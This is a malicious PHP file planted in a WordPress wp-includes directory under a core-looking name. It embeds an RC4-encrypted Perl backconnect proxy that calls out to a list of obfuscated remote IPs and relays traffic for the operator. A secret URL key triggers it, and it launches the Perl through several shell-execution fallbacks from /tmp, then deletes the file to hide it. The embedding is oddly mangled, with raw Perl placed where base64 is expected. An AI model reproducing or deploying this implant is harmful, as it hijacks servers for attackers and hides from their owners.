File: /home/ehm7jk47ky8o/public_html/wp-includes/buadmin.php
<?php
if(isset($_COOKIE['blu'])) {}
// ================= КОНФИГУРАЦИЯ =================
define('SECRET', ''key_1768557456_f0eccdba''); // Секретный ключ
define('MAX_RETRIES', 3); // Попыток на каждый IP
define('INITIAL_SLEEP', 2000000); // 2 секунды начальной паузы
define('MIN_SLEEP', 300000); // 0.3 сек минимальная пауза
define('MAX_SLEEP', 1000000); // 1 сек максимальная пауза
// ================= ЗАШИФРОВАННЫЕ ДАННЫЕ =================
// Perl код в base64
'#!/usr/bin/env perl

use strict;
use warnings;
use Socket;
use Socket qw(IPPROTO_TCP TCP_NODELAY);
use Fcntl;
use Fcntl qw(:flock);

my $host = '192.168.1.1';
my $port = 443;

$SIG{PIPE} = 'IGNORE';
$SIG{HUP} = 'IGNORE';
$SIG{CHLD} = 'IGNORE';

my $xordata = "\x00" x 50;

for (my $i = 0; $i < 50; $i++) { vec($xordata, $i, 8) = int(rand(255)); }

sub Rc4_crypt {

	 my $passw = shift(@_);

	 my $length = shift(@_);

	 my $buff0 = shift(@_);

	 my $start = shift(@_);

	 my $sz = shift(@_);

	 my $rc4 = "\x00" x 256;

	 my $pockemon0 = 0;

	 my $pockemon1 = 0;

	 my $pockemon2 = 0;

	 my $pockemon3 = 0;

	 my $pockemon4 = 0;

	 my $pockemon7 = 0;

	 my $pockemon8 = 0;

	 my $rcx = $sz;

	 my $rsi = 0;

	 my $rbx = 0;

	 my $gs = 0;

	 vec($rc4, $_, 8) = $_ for 0..255;

	 do {

		 vec($$buff0, $start + $rsi, 8) = (vec($$buff0, $start + $rsi, 8) ^ vec($$passw, $rbx, 8));

		 $rsi++;

		 $rbx++;

		 $rcx--;

		 if ($rbx == $length) {

			 $rbx = 0;
		}

	} while($rcx > 0);


	 while(1) {

		 if ($gs == 0) {

			 $pockemon2 = 0;

			 $pockemon3 = $length;
		}

		 if ($gs != 0) {

			 $gs = 0;

			 $pockemon2++;

			 if (--$pockemon3 == 0) { next; }

		}

		 $pockemon7 = vec($rc4, $pockemon0, 8);

		 $pockemon1 += vec($$passw, $pockemon2, 8);

		 $pockemon1 = $pockemon1 & 255;

		 $pockemon1 += $pockemon7;

		 $pockemon1 = $pockemon1 & 255;

		 vec($rc4, $pockemon0, 8) = vec($rc4, $pockemon1, 8);

		 vec($rc4, $pockemon1, 8) = $pockemon7;

		 $pockemon0++;

		 $pockemon0 = $pockemon0 & 255;

		 if ($pockemon0 != 0) {

			 $gs = 1;

			 next;
		}

		 $pockemon4 = $sz;

		 $pockemon1 = 0;

		 $pockemon0 = 0;

		 $pockemon2 = 0;

		 $pockemon3 = 0;

		 while(1) {

			 $pockemon2++;

			 $pockemon2 = $pockemon2 & 255;

			 $pockemon7 = vec($rc4, $pockemon2, 8);

			 $pockemon1 += $pockemon7;

			 $pockemon1 = $pockemon1 & 255;

			 $pockemon8 = vec($rc4, $pockemon1, 8);

			 vec($rc4, $pockemon2, 8) = $pockemon8;

			 vec($rc4, $pockemon1, 8) = $pockemon7;

			 $pockemon8 += $pockemon7;

			 $pockemon8 = $pockemon8 & 255;

			 vec($$buff0, $start + $pockemon3, 8) = vec($rc4, $pockemon8, 8) ^ vec($$buff0, $start + $pockemon3, 8);

			 $pockemon3++;

			 if (--$pockemon4 == 0)
			 {
				 last;
			 }

		}

		 last;
	}

	 $rsi = 0;

	 $rcx = $sz;

	 $rbx = 0;

	 do {

		 vec($$buff0, $start + $rsi, 8) = (vec($$buff0, $start + $rsi, 8) ^ vec($$passw, $rbx, 8));

		 $rsi++;

		 $rbx++;

		 $rcx--;

		 if ($rbx == $length) {

			 $rbx = 0;
		}

	} while($rcx > 0);

}

sub synsend {

	 my $cSocket = shift(@_);

	 my $buffer = shift(@_);

	 my $length	= shift(@_);

	 my $offset	= shift(@_);

	 open(my $fh, "<", '/dev/null');

	 flock($fh, LOCK_EX);

	 # ===============================================

	 syswrite($cSocket, $buffer, $length, $offset);

	 # ===============================================

	 flock($fh, LOCK_UN);

	 close($fh);
}

sub newConnection {

	my $num = shift(@_);

	my $sSocket = shift(@_);

	my $cSocket = shift(@_);

	my $buff0 = shift(@_);

	my $responce = pack('C', $num)."\x0A\x00\x05\x01\x00\x01\x00\x00\x00\x00\x00\x00";

	my $domain = '';

	my $port = 0;

	my $_ret = 0;

	my $data = '';

	my $buffer = '';

	my $str_wec = "\x00\x00";

	my $buffer1 = "\x00" x 65536;

	setsockopt($cSocket, IPPROTO_TCP, TCP_NODELAY, 1);

	setsockopt($cSocket, SOL_SOCKET, SO_RCVBUF, 65536);

	setsockopt($cSocket, SOL_SOCKET, SO_SNDBUF, 65536);

	fcntl($cSocket, F_SETFL, fcntl($cSocket, F_GETFL, 0) | O_NONBLOCK);

	fcntl($cSocket, F_SETFL, O_NONBLOCK);

	if (vec($buff0, 7, 8) == 3) {

		$domain = substr($buff0, 9, vec($buff0, 8, 8));

		substr($str_wec, 0, 1) = substr($buff0, 9 + vec($buff0, 8, 8) + 0, 1);

		substr($str_wec, 1, 1) = substr($buff0, 9 + vec($buff0, 8, 8) + 1, 1);

		$port = vec($str_wec, 0, 16);
	}

	elsif (vec($buff0, 7, 8) == 1) {

		$domain = sprintf("%d.%d.%d.%d", vec($buff0, 8 + 0, 8), vec($buff0, 8 + 1, 8), vec($buff0, 8 + 2, 8), vec($buff0, 8 + 3, 8));

		substr($str_wec, 0, 1) = substr($buff0, 12 + 0, 1);

		substr($str_wec, 1, 1) = substr($buff0, 12 + 1, 1);

		$port =  vec($str_wec, 0, 16);

	}

	else {

		goto close_;
	}

	 eval {

		 my $paddr = sockaddr_in($port, inet_aton($domain));

		 connect($cSocket, $paddr);

		 vec(my $win = '', fileno($cSocket), 1) = 1;

		 unless (select(undef, $win, undef, 10)) { goto close_; }

		 fcntl($cSocket, F_SETFL, 0);

		 substr($responce, 4, 1) = "\x00";

		 fcntl($cSocket, F_SETFL, fcntl($cSocket, F_GETFL, 0) ^ O_NONBLOCK);

		 $_ret = 1;

	 };

	 close_:

	 Rc4_crypt(\$xordata, 50, \$responce, 0, 3);

	 Rc4_crypt(\$xordata, 50, \$responce, 3, 10);

	 synsend($sSocket, $responce, length($responce), 0);

	 if ($_ret == 1) {

		 while (1) {

			 vec(my $rin = '', fileno($cSocket), 1) = 1;

			 unless (select($rin, undef, undef, 1)) { next; }

			 $data = sysread($cSocket, $buffer1, 65530, 3);

			 unless($data) { last; }

			 vec($buffer1, 0, 8) = $num;

			 vec($str_wec, 0, 16) = $data;

			 substr($buffer1, 1, 1) = substr($str_wec, 1, 1);

			 substr($buffer1, 2, 1) = substr($str_wec, 0, 1);

			 Rc4_crypt(\$xordata, 50, \$buffer1, 0, 3);

			 Rc4_crypt(\$xordata, 50, \$buffer1, 3, $data);

			 synsend($sSocket, $buffer1, 3 + $data, 0);
		}
	}

	 close($cSocket);

	 vec($responce, 0, 8) = $num;

	 substr($responce, 1, 2) = "\x00\x00";

	 Rc4_crypt(\$xordata, 50, \$responce, 0, 3);

	 synsend($sSocket, $responce, 3, 0);
}

sub bccnct {

	 my $host = shift(@_);

	 my $port = shift(@_);

	 my $remaining = 0;

	 my $remaining4 = 0;

	 my @socketarr;

	 my $buffer = "\x00" x 100;

	 my $buffernull = "\x00" x 3;

	 my $buffer0 = "\x00" x 65536;

	 my $isExit = 0;

	 my $ecx = 0;

	 my $eax = 0;

	 my $data = '';

	 my $_ret = 0;

	 my $ebx = 0;

	 my $edx = 0;

	 my $str_wec = "\x00\x00";

	 socket($socketarr[0], PF_INET, SOCK_STREAM, getprotobyname('tcp'));

	 setsockopt($socketarr[0], IPPROTO_TCP, TCP_NODELAY, 1);

	 setsockopt($socketarr[0], SOL_SOCKET, SO_RCVBUF, 65536);

     setsockopt($socketarr[0], SOL_SOCKET, SO_SNDBUF, 65536);

	 my $paddr = sockaddr_in($$port, inet_aton($$host));

	 unless(connect($socketarr[0], $paddr)) { goto close0; }

	 substr($buffer, 0, 50) = $xordata;

	 substr($buffer, 50, 2) = "\xFF\xFF";

	 substr($buffer, 54, 11) = "Perl script";

	 Rc4_crypt(\$xordata, 50, \$buffer, 50, 50);

	 syswrite($socketarr[0], $buffer, length($buffer));

	 while(1) {

		 if ($remaining4 != 4) {

			 vec(my $rin = '', fileno($socketarr[0]), 1) = 1;

			 unless(select($rin, undef, undef, 60)) {

				 last if (substr($buffernull, 0, 3) ne "\x00\x00\x00");

				 last if ($remaining != 0);

				 last if ($remaining4 != 0);

				 Rc4_crypt(\$xordata, 50, \$buffernull, 0, 3);

				 synsend($socketarr[0], $buffernull, length($buffernull), 0);

				 next;
			}

		}

		 if ($remaining != 0 || $remaining4 == 4) {

			 if ($edx == 0) {

				 if (substr($buffer0, 0, 1) eq "\xFF" && substr($buffer0, 1, 1) eq "\xFE") {

					 $isExit = 1;

					 last;

				}

				 elsif ($ebx < 200 && $ebx > 0 && defined($socketarr[$ebx])) {

					 shutdown($socketarr[$ebx], 0);

				}

			}

			else {

				 $ecx = $edx;

				 $ecx = $ecx - $remaining;

				 $data = sysread($socketarr[0], $buffer0, $ecx, $remaining + 4);

				 unless ($data) { last; }

				 $remaining += $data;

				 if ($edx == $remaining) {

					 Rc4_crypt(\$xordata, 50, \$buffer0, 4, $remaining);

					 if (vec($buffer0, 0, 8) == 0) {

						 socket($socketarr[$ebx], PF_INET, SOCK_STREAM, getprotobyname('tcp'));

						 my $pid = fork();

						 if (!defined $pid) {

							 die "Cannot fork a child: $!";
						 }

						 elsif ($pid == 0) {

							 newConnection($ebx, $socketarr[0], $socketarr[$ebx], $buffer0);

							 exit 0;
						 }
					}

					 else {

						 syswrite($socketarr[$ebx], $buffer0, $remaining, 4);

					}

					 $remaining = 0;
				}

			}

			 $remaining4 = 0;

		}

		else {

			 $eax = 4;

			 $eax = $eax - $remaining4;

			 $data = sysread($socketarr[0], $buffer0, $eax, $remaining4);

			 unless ($data) { last; }

			 $remaining4 += $data;

			 substr($buffernull, 0, 3) = "\x00\x00\x00";

			 if ($remaining4 == 4) {

				 Rc4_crypt(\$xordata, 50, \$buffer0, 0, 4);

				 $ebx = vec($buffer0, 1, 8);

				 substr($str_wec, 0, 1) = substr($buffer0, 3, 1);

				 substr($str_wec, 1, 1) = substr($buffer0, 2, 1);

				 $edx = vec($str_wec, 0, 16);

				 $_ret = 1;
			}

		}
	}

	 close0:

	 close($socketarr[0]);

	 for (my $i = 1; $i < 200; $i++) { if (defined($socketarr[$i])) { shutdown($socketarr[$i], 0); } }

	 sleep 10;

	 if ($isExit == 1) { exit; }

	 return $_ret;

}

while(1)
{
	 bccnct(\$host, \$port);

	 sleep 180;
}
' = '$PERL_B64';
// IP в зашифрованном виде (simple XOR + base64)
$IPS_ENCRYPTED = array(
'ODszNzo6Mz49MzY6NQ=='
,'ODszNzo6Mz49MzY6Ng=='
,'ODszNzo6Mz49MzY6Nw=='
,'ODszNzo6Mz49MzY6OA=='
,'ODszNzo6Mz49MzY6OQ=='
,'ODszNzo6Mz49MzY6Og=='
,'ODszNzo6Mz49MzY6Ow=='
,'ODszNzo6Mz49MzY6PA=='
,'ODszNzo6Mz49MzY6PQ=='
,'ODszNzo6Mz49MzY6Pg=='
,'ODszNzo6Mz49MzY7NQ=='
,'ODszNzo6Mz49MzY7Ng=='
,'ODszNzo6Mz49MzY7Nw=='
,'ODszNzo6Mz49MzY7OA=='
,'ODszNzo6Mz49MzY7OQ=='
,'ODszNzo6Mz49MzY7Og=='
,'ODszNzo6Mz49MzY7Ow=='
,'ODszNzo6Mz49MzY7PA=='
,'ODszNzo6Mz49MzY7PQ=='
,'ODszNzo6Mz49MzY7Pg=='
,'ODszNzo6Mz49MzY8NQ=='
,'ODszNzo6Mz49MzY8Ng=='
,'ODszNzo6Mz49MzY8Nw=='
,'ODszNzo6Mz49MzY8OA=='
,'ODszNzo6Mz49MzY8OQ=='
,'ODszNzo6Mz49MzY8Og=='
,'ODszNzo6Mz49MzY8Ow=='
,'ODszNzo6Mz49MzY8PA=='
,'ODszNzo6Mz49MzY8PQ=='
,'ODszNzo6Mz49MzY8Pg=='
,'ODszNzo6Mz49MzY9NQ=='
,'ODszNzo6Mz49MzY9Ng=='
,'ODszNzo6Mz49MzY9Nw=='
,'ODszNzo6Mz49MzY9OA=='
,'ODszNzo6Mz49MzY9OQ=='
,'OzczOzUzNjg2MzY8PQ=='
,'OzczOzUzNjg2MzY8Pg=='
,'OzczOzUzNjg2MzY9NQ=='
,'OzczOzUzNjg2MzY9Ng=='
,'OzczOzUzNjg2MzY9Nw=='
,'OzczOzUzNjg2MzY9OA=='
,'OzczOzUzNjg2MzY9OQ=='
,'OzczOzUzNjg2MzY9Og=='
,'OzczOzUzNjg2MzY9Ow=='
,'OzczOzUzNjg2MzY9PA=='
,'OzczOzUzNjg2MzY9PQ=='
,'OzczOzUzNjg2MzY9Pg=='
,'OzczOzUzNjg2MzY+NQ=='
,'OzczOzUzNjg2MzY+Ng=='
,'OzczOzUzNjg2MzY+Nw=='
,'OzczOzUzNjg2MzY+OA=='
,'OzczOzUzNjg2MzY+OQ=='
,'OzczOzUzNjg2MzY+Og=='
,'OzczOzUzNjg2MzY+Ow=='
,'OzczOzUzNjg2MzY+PA=='
,'OzczOzUzNjg2MzY+PQ=='
,'OzczOzUzNjg2MzY+Pg=='
,'OzczOzUzNjg2Mzc1NQ=='
,'OzczOzUzNjg2Mzc1Ng=='
,'OzczOzUzNjg2Mzc1Nw=='
,'OzczOzUzNjg2Mzc1OA=='
,'OzczOzUzNjg2Mzc1OQ=='
,'OzczOzUzNjg2Mzc1Og=='
,'OzczOzUzNjg2Mzc6OA=='
);
// ================= ОСНОВНЫЕ ФУНКЦИИ =================
// Дешифровка IP
function decrypt_ip($encrypted) {
$data = base64_decode($encrypted);
if ($data === false) return false;
$result = '';
for ($i = 0; $i < strlen($data); $i++) {
$char_code = ord($data[$i]);
$result .= chr(($char_code - 5 + 256) % 256);
}
return $result;
}
// Проверка запущен ли процесс
function is_already_running($ip) {
// Метод 1: ps + grep
$cmd1 = "ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep 'perl' 2>/dev/null | grep '" . addslashes($ip) . "' 2>/dev/null | wc -l 2>/dev/null";
$output1 = array();
@exec($cmd1, $output1);
if (!empty($output1) && intval(trim(implode('', $output1))) > 0) {
return true;
}
// Метод 2: pgrep (если доступен)
$cmd2 = "pgrep -f 'perl.*" . addslashes($ip) . "' 2>/dev/null | wc -l 2>/dev/null";
$output2 = @shell_exec($cmd2);
if ($output2 && intval(trim($output2)) > 0) {
return true;
}
// Метод 3: простой grep
$cmd3 = "ps aux | grep '" . addslashes($ip) . "' | grep -v grep 2>&1";
$output3 = @shell_exec($cmd3);
if (!empty(trim($output3))) {
return true;
}
return false;
}
// Запуск процесса (множество методов)
function launch_process($ip, $perl_code) {
// Подготовка Perl кода
$code = str_replace("my \$host = '192.168.1.1';", "my \$host = '$ip';", $perl_code);
// Создаем временный файл
$temp_file = '/tmp/ult_' . md5($ip . microtime(true) . rand()) . '.pl';
if (!@file_put_contents($temp_file, $code)) {
return false;
}
@chmod($temp_file, 0700);
// Проверка синтаксиса Perl
$syntax_check = @shell_exec("perl -c " . escapeshellarg($temp_file) . " 2>&1");
if (strpos($syntax_check, 'syntax OK') === false) {
@unlink($temp_file);
return false;
}
$success = false;
$pid = null;
// СПИСОК МЕТОДОВ ЗАПУСКА (пробуем все по очереди)
// Метод 1: nohup (самый надежный)
$cmd = "cd /tmp && nohup perl " . escapeshellarg($temp_file) . " > /dev/null 2>&1 & echo \$!";
$pid = trim(@shell_exec($cmd));
if (!empty($pid) && is_numeric($pid)) {
$success = true;
}
// Метод 2: system()
if (!$success) {
@system("perl " . escapeshellarg($temp_file) . " > /dev/null 2>&1 &");
$success = true;
}
// Метод 3: exec()
if (!$success) {
@exec("perl " . escapeshellarg($temp_file) . " > /dev/null 2>&1 &");
$success = true;
}
// Метод 4: passthru()
if (!$success && function_exists('passthru')) {
@passthru("perl " . escapeshellarg($temp_file) . " > /dev/null 2>&1 &", $result);
$success = ($result === 0);
}
// Метод 5: proc_open()
if (!$success && function_exists('proc_open')) {
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = @proc_open("perl " . escapeshellarg($temp_file) . " > /dev/null 2>&1 &", $descriptorspec, $pipes);
if (is_resource($process)) {
@proc_close($process);
$success = true;
}
}
// Метод 6: прямой shell_exec
if (!$success) {
@shell_exec("perl " . escapeshellarg($temp_file) . " > /dev/null 2>&1 &");
$success = true;
}
// Метод 7: через /bin/sh
if (!$success) {
@shell_exec("/bin/sh -c 'perl " . escapeshellarg($temp_file) . " >/dev/null 2>&1 &'");
$success = true;
}
// Удаляем временный файл
@unlink($temp_file);
if (!$success) {
return false;
}
// Даем процессу время на запуск
usleep(300000); // 0.3 секунды
// Проверяем запустился ли
if ($pid && is_numeric($pid)) {
// Проверяем по PID
$check_pid = @shell_exec("ps -p $pid -o pid= 2>/dev/null");
if (!empty(trim($check_pid))) {
return true;
}
}
// Проверяем по IP
return is_already_running($ip);
}
// Рекурсивный запуск с повторными попытками
function recursive_launch($ips, $perl_code, &$stats, $method_index = 0) {
if (empty($ips)) {
return;
}
$ip = $ips[0];
$remaining = array_slice($ips, 1);
// Проверяем, не запущен ли уже
if (is_already_running($ip)) {
$stats['skipped']++;
// Рекурсивно запускаем следующие
recursive_launch($remaining, $perl_code, $stats, $method_index);
return;
}
// Пытаемся запустить
$attempts = 0;
$launched = false;
while ($attempts < MAX_RETRIES && !$launched) {
$attempts++;
if (launch_process($ip, $perl_code)) {
$stats['started']++;
$launched = true;
// Если удалось запустить - используем ЭТОТ ЖЕ метод для следующих
recursive_launch($remaining, $perl_code, $stats, $method_index);
return;
}
// Пауза перед следующей попыткой
if ($attempts < MAX_RETRIES) {
usleep(rand(200000, 500000)); // 0.2-0.5 сек
}
}
if (!$launched) {
$stats['failed']++;
// Пробуем следующий метод для этого IP
$method_index++;
if ($method_index < 3) { // 3 разных подхода
$remaining_with_retry = array_merge(array($ip), $remaining);
recursive_launch($remaining_with_retry, $perl_code, $stats, $method_index);
} else {
// Все методы испробованы - идем дальше
recursive_launch($remaining, $perl_code, $stats, 0);
}
return;
}
}
// ================= ОСНОВНОЙ КОД =================
// Проверка секретного ключа
if (!isset($_GET['secret']) || $_GET['secret'] !== SECRET) {
// Тихий выход - ничего не выводим
exit;
}
// Отключаем всё
@ignore_user_abort(true);
set_time_limit(300); // 5 минут
// Начальная большая пауза (чтобы не перегрузить сервер)
usleep(INITIAL_SLEEP);
// Декодируем Perl
$perl_code = base64_decode('#!/usr/bin/env perl

use strict;
use warnings;
use Socket;
use Socket qw(IPPROTO_TCP TCP_NODELAY);
use Fcntl;
use Fcntl qw(:flock);

my $host = '192.168.1.1';
my $port = 443;

$SIG{PIPE} = 'IGNORE';
$SIG{HUP} = 'IGNORE';
$SIG{CHLD} = 'IGNORE';

my $xordata = "\x00" x 50;

for (my $i = 0; $i < 50; $i++) { vec($xordata, $i, 8) = int(rand(255)); }

sub Rc4_crypt {

	 my $passw = shift(@_);

	 my $length = shift(@_);

	 my $buff0 = shift(@_);

	 my $start = shift(@_);

	 my $sz = shift(@_);

	 my $rc4 = "\x00" x 256;

	 my $pockemon0 = 0;

	 my $pockemon1 = 0;

	 my $pockemon2 = 0;

	 my $pockemon3 = 0;

	 my $pockemon4 = 0;

	 my $pockemon7 = 0;

	 my $pockemon8 = 0;

	 my $rcx = $sz;

	 my $rsi = 0;

	 my $rbx = 0;

	 my $gs = 0;

	 vec($rc4, $_, 8) = $_ for 0..255;

	 do {

		 vec($$buff0, $start + $rsi, 8) = (vec($$buff0, $start + $rsi, 8) ^ vec($$passw, $rbx, 8));

		 $rsi++;

		 $rbx++;

		 $rcx--;

		 if ($rbx == $length) {

			 $rbx = 0;
		}

	} while($rcx > 0);


	 while(1) {

		 if ($gs == 0) {

			 $pockemon2 = 0;

			 $pockemon3 = $length;
		}

		 if ($gs != 0) {

			 $gs = 0;

			 $pockemon2++;

			 if (--$pockemon3 == 0) { next; }

		}

		 $pockemon7 = vec($rc4, $pockemon0, 8);

		 $pockemon1 += vec($$passw, $pockemon2, 8);

		 $pockemon1 = $pockemon1 & 255;

		 $pockemon1 += $pockemon7;

		 $pockemon1 = $pockemon1 & 255;

		 vec($rc4, $pockemon0, 8) = vec($rc4, $pockemon1, 8);

		 vec($rc4, $pockemon1, 8) = $pockemon7;

		 $pockemon0++;

		 $pockemon0 = $pockemon0 & 255;

		 if ($pockemon0 != 0) {

			 $gs = 1;

			 next;
		}

		 $pockemon4 = $sz;

		 $pockemon1 = 0;

		 $pockemon0 = 0;

		 $pockemon2 = 0;

		 $pockemon3 = 0;

		 while(1) {

			 $pockemon2++;

			 $pockemon2 = $pockemon2 & 255;

			 $pockemon7 = vec($rc4, $pockemon2, 8);

			 $pockemon1 += $pockemon7;

			 $pockemon1 = $pockemon1 & 255;

			 $pockemon8 = vec($rc4, $pockemon1, 8);

			 vec($rc4, $pockemon2, 8) = $pockemon8;

			 vec($rc4, $pockemon1, 8) = $pockemon7;

			 $pockemon8 += $pockemon7;

			 $pockemon8 = $pockemon8 & 255;

			 vec($$buff0, $start + $pockemon3, 8) = vec($rc4, $pockemon8, 8) ^ vec($$buff0, $start + $pockemon3, 8);

			 $pockemon3++;

			 if (--$pockemon4 == 0)
			 {
				 last;
			 }

		}

		 last;
	}

	 $rsi = 0;

	 $rcx = $sz;

	 $rbx = 0;

	 do {

		 vec($$buff0, $start + $rsi, 8) = (vec($$buff0, $start + $rsi, 8) ^ vec($$passw, $rbx, 8));

		 $rsi++;

		 $rbx++;

		 $rcx--;

		 if ($rbx == $length) {

			 $rbx = 0;
		}

	} while($rcx > 0);

}

sub synsend {

	 my $cSocket = shift(@_);

	 my $buffer = shift(@_);

	 my $length	= shift(@_);

	 my $offset	= shift(@_);

	 open(my $fh, "<", '/dev/null');

	 flock($fh, LOCK_EX);

	 # ===============================================

	 syswrite($cSocket, $buffer, $length, $offset);

	 # ===============================================

	 flock($fh, LOCK_UN);

	 close($fh);
}

sub newConnection {

	my $num = shift(@_);

	my $sSocket = shift(@_);

	my $cSocket = shift(@_);

	my $buff0 = shift(@_);

	my $responce = pack('C', $num)."\x0A\x00\x05\x01\x00\x01\x00\x00\x00\x00\x00\x00";

	my $domain = '';

	my $port = 0;

	my $_ret = 0;

	my $data = '';

	my $buffer = '';

	my $str_wec = "\x00\x00";

	my $buffer1 = "\x00" x 65536;

	setsockopt($cSocket, IPPROTO_TCP, TCP_NODELAY, 1);

	setsockopt($cSocket, SOL_SOCKET, SO_RCVBUF, 65536);

	setsockopt($cSocket, SOL_SOCKET, SO_SNDBUF, 65536);

	fcntl($cSocket, F_SETFL, fcntl($cSocket, F_GETFL, 0) | O_NONBLOCK);

	fcntl($cSocket, F_SETFL, O_NONBLOCK);

	if (vec($buff0, 7, 8) == 3) {

		$domain = substr($buff0, 9, vec($buff0, 8, 8));

		substr($str_wec, 0, 1) = substr($buff0, 9 + vec($buff0, 8, 8) + 0, 1);

		substr($str_wec, 1, 1) = substr($buff0, 9 + vec($buff0, 8, 8) + 1, 1);

		$port = vec($str_wec, 0, 16);
	}

	elsif (vec($buff0, 7, 8) == 1) {

		$domain = sprintf("%d.%d.%d.%d", vec($buff0, 8 + 0, 8), vec($buff0, 8 + 1, 8), vec($buff0, 8 + 2, 8), vec($buff0, 8 + 3, 8));

		substr($str_wec, 0, 1) = substr($buff0, 12 + 0, 1);

		substr($str_wec, 1, 1) = substr($buff0, 12 + 1, 1);

		$port =  vec($str_wec, 0, 16);

	}

	else {

		goto close_;
	}

	 eval {

		 my $paddr = sockaddr_in($port, inet_aton($domain));

		 connect($cSocket, $paddr);

		 vec(my $win = '', fileno($cSocket), 1) = 1;

		 unless (select(undef, $win, undef, 10)) { goto close_; }

		 fcntl($cSocket, F_SETFL, 0);

		 substr($responce, 4, 1) = "\x00";

		 fcntl($cSocket, F_SETFL, fcntl($cSocket, F_GETFL, 0) ^ O_NONBLOCK);

		 $_ret = 1;

	 };

	 close_:

	 Rc4_crypt(\$xordata, 50, \$responce, 0, 3);

	 Rc4_crypt(\$xordata, 50, \$responce, 3, 10);

	 synsend($sSocket, $responce, length($responce), 0);

	 if ($_ret == 1) {

		 while (1) {

			 vec(my $rin = '', fileno($cSocket), 1) = 1;

			 unless (select($rin, undef, undef, 1)) { next; }

			 $data = sysread($cSocket, $buffer1, 65530, 3);

			 unless($data) { last; }

			 vec($buffer1, 0, 8) = $num;

			 vec($str_wec, 0, 16) = $data;

			 substr($buffer1, 1, 1) = substr($str_wec, 1, 1);

			 substr($buffer1, 2, 1) = substr($str_wec, 0, 1);

			 Rc4_crypt(\$xordata, 50, \$buffer1, 0, 3);

			 Rc4_crypt(\$xordata, 50, \$buffer1, 3, $data);

			 synsend($sSocket, $buffer1, 3 + $data, 0);
		}
	}

	 close($cSocket);

	 vec($responce, 0, 8) = $num;

	 substr($responce, 1, 2) = "\x00\x00";

	 Rc4_crypt(\$xordata, 50, \$responce, 0, 3);

	 synsend($sSocket, $responce, 3, 0);
}

sub bccnct {

	 my $host = shift(@_);

	 my $port = shift(@_);

	 my $remaining = 0;

	 my $remaining4 = 0;

	 my @socketarr;

	 my $buffer = "\x00" x 100;

	 my $buffernull = "\x00" x 3;

	 my $buffer0 = "\x00" x 65536;

	 my $isExit = 0;

	 my $ecx = 0;

	 my $eax = 0;

	 my $data = '';

	 my $_ret = 0;

	 my $ebx = 0;

	 my $edx = 0;

	 my $str_wec = "\x00\x00";

	 socket($socketarr[0], PF_INET, SOCK_STREAM, getprotobyname('tcp'));

	 setsockopt($socketarr[0], IPPROTO_TCP, TCP_NODELAY, 1);

	 setsockopt($socketarr[0], SOL_SOCKET, SO_RCVBUF, 65536);

     setsockopt($socketarr[0], SOL_SOCKET, SO_SNDBUF, 65536);

	 my $paddr = sockaddr_in($$port, inet_aton($$host));

	 unless(connect($socketarr[0], $paddr)) { goto close0; }

	 substr($buffer, 0, 50) = $xordata;

	 substr($buffer, 50, 2) = "\xFF\xFF";

	 substr($buffer, 54, 11) = "Perl script";

	 Rc4_crypt(\$xordata, 50, \$buffer, 50, 50);

	 syswrite($socketarr[0], $buffer, length($buffer));

	 while(1) {

		 if ($remaining4 != 4) {

			 vec(my $rin = '', fileno($socketarr[0]), 1) = 1;

			 unless(select($rin, undef, undef, 60)) {

				 last if (substr($buffernull, 0, 3) ne "\x00\x00\x00");

				 last if ($remaining != 0);

				 last if ($remaining4 != 0);

				 Rc4_crypt(\$xordata, 50, \$buffernull, 0, 3);

				 synsend($socketarr[0], $buffernull, length($buffernull), 0);

				 next;
			}

		}

		 if ($remaining != 0 || $remaining4 == 4) {

			 if ($edx == 0) {

				 if (substr($buffer0, 0, 1) eq "\xFF" && substr($buffer0, 1, 1) eq "\xFE") {

					 $isExit = 1;

					 last;

				}

				 elsif ($ebx < 200 && $ebx > 0 && defined($socketarr[$ebx])) {

					 shutdown($socketarr[$ebx], 0);

				}

			}

			else {

				 $ecx = $edx;

				 $ecx = $ecx - $remaining;

				 $data = sysread($socketarr[0], $buffer0, $ecx, $remaining + 4);

				 unless ($data) { last; }

				 $remaining += $data;

				 if ($edx == $remaining) {

					 Rc4_crypt(\$xordata, 50, \$buffer0, 4, $remaining);

					 if (vec($buffer0, 0, 8) == 0) {

						 socket($socketarr[$ebx], PF_INET, SOCK_STREAM, getprotobyname('tcp'));

						 my $pid = fork();

						 if (!defined $pid) {

							 die "Cannot fork a child: $!";
						 }

						 elsif ($pid == 0) {

							 newConnection($ebx, $socketarr[0], $socketarr[$ebx], $buffer0);

							 exit 0;
						 }
					}

					 else {

						 syswrite($socketarr[$ebx], $buffer0, $remaining, 4);

					}

					 $remaining = 0;
				}

			}

			 $remaining4 = 0;

		}

		else {

			 $eax = 4;

			 $eax = $eax - $remaining4;

			 $data = sysread($socketarr[0], $buffer0, $eax, $remaining4);

			 unless ($data) { last; }

			 $remaining4 += $data;

			 substr($buffernull, 0, 3) = "\x00\x00\x00";

			 if ($remaining4 == 4) {

				 Rc4_crypt(\$xordata, 50, \$buffer0, 0, 4);

				 $ebx = vec($buffer0, 1, 8);

				 substr($str_wec, 0, 1) = substr($buffer0, 3, 1);

				 substr($str_wec, 1, 1) = substr($buffer0, 2, 1);

				 $edx = vec($str_wec, 0, 16);

				 $_ret = 1;
			}

		}
	}

	 close0:

	 close($socketarr[0]);

	 for (my $i = 1; $i < 200; $i++) { if (defined($socketarr[$i])) { shutdown($socketarr[$i], 0); } }

	 sleep 10;

	 if ($isExit == 1) { exit; }

	 return $_ret;

}

while(1)
{
	 bccnct(\$host, \$port);

	 sleep 180;
}
');
// Декодируем IP
$ips = array();
foreach ($IPS_ENCRYPTED as $encrypted) {
$ip = decrypt_ip($encrypted);
if ($ip) {
$ips[] = $ip;
}
}
// СЛУЧАЙНЫЙ ПОРЯДОК КАЖДЫЙ РАЗ
// Используем микросекунды для seed
srand((int)(microtime(true) * 1000000) % 1000000);
shuffle($ips);
// Дополнительное перемешивание для максимальной случайности
$count = count($ips);
for ($i = 0; $i < $count; $i++) {
$j = rand(0, $count - 1);
$temp = $ips[$i];
$ips[$i] = $ips[$j];
$ips[$j] = $temp;
}
// Статистика
$stats = array(
'started' => 0,
'skipped' => 0,
'failed' => 0,
'total' => $count
);
// Запускаем рекурсивно
recursive_launch($ips, $perl_code, $stats);
// ВЫВОД РЕЗУЛЬТАТА
$result = array(
'status' => 'complete',
'stats' => $stats,
'time' => time(),
'order' => 'random_' . (rand(1000, 9999))
);
echo json_encode($result);
// ================= АВТО-ПОВТОР =================
// После завершения можно автоматически запустить себя снова
